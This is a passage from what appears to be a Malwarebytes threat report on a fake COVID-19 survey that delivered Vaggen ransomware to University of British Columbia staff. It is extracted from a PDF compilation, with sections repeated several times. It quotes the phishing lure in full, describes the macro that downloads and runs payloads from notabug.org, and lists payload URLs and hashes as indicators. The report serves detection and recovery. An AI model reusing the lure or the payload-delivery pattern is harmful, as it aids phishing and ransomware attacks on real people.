successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2660 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2661 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2662 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2663 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2664 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2665 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2666 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2667 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2668 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2669 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2670 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2671 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2672 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2673 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2674 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2675 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2676 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2677 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2678 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2679 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2680 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2681 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2682 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2683 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2684 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2685 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2686 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2687 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2688 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2689 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2690 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2691 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2692 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2693 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand 